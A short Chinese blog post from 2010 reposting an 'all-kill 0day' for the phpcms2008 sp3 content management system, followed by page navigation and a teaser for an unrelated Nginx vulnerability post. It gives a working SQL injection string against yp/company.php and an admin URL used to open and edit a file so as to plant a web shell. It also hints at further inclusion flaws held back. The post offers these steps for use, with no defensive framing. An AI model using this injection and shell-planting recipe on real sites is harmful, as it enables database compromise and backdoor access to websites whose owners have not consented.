phpcms2008 sp3通杀0day
2010年5月23日星期日 | | |From 情'blog
此漏洞半年前已由dindle发布在海洋顶端,所以转载请著名来源
注入
yp/company.php?where=%23
进入后台访问
http://www.xx.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php
编辑shell,另外phpcms2008有多出包含漏洞,尚未得到合适利用暂时先不发布了
我的QQ空间
再提供一种解决Nginx文件类型错误解析漏洞的方法
昨日,80Sec 爆出Nginx具有严重的0day漏洞,详见《Nginx文件类...